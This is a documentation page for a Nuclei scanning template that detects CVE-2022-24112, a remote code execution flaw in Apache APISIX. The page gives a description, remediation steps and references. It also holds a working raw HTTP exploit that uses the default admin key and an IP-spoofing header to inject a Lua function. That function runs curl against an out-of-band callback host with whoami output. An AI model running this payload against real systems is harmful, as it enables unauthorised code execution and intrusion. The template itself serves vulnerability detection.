Apache APISIX - Remote Code Execution
ID: CVE-2022-24112
Severity: critical
Author: Mr-xn
Tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive
Description
Section titled “Description”A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX’s data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
YAML Source
Section titled “YAML Source”id: CVE-2022-24112
info: name: Apache APISIX - Remote Code Execution author: Mr-xn severity: critical description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). reference: - https://www.openwall.com/lists/oss-security/2022/02/11/3 - https://twitter.com/sirifu4k1/status/1496043663704858625 - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - http://www.openwall.com/lists/oss-security/2022/02/11/3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 epss-score: 0.97411 epss-percentile: 0.99928 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: apisix shodan-query: - title:"Apache APISIX Dashboard" - http.title:"apache apisix dashboard" fofa-query: - title="Apache APISIX Dashboard" - title="apache apisix dashboard" google-query: intitle:"apache apisix dashboard" tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive
http: - raw: - | POST /apisix/batch-requests HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9
{ "headers":{ "X-Real-IP":"127.0.0.1", "Content-Type":"application/json" }, "timeout":1500, "pipeline":[ { "method":"PUT", "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}" } ] } - | GET /api/{{randstr}} HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9
matchers-condition: and matchers: - type: word part: body_1 words: - '"reason":"OK"' - '"status":200' condition: and
- type: word part: interactsh_protocol words: - http
- type: status status: - 200
extractors: - type: regex group: 1 regex: - GET \/([a-z-]+) HTTP part: interactsh_request# digest: 490a00463044022002a6d5d033f31777ce720d5b96d5b98093bc79a697ac68fc612ba1c93890b340022014a90ff5e8329e4d5c4dbb941ecebd0a2b75fa64eca5dbdf142d23de3108b5f2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-24112.yaml"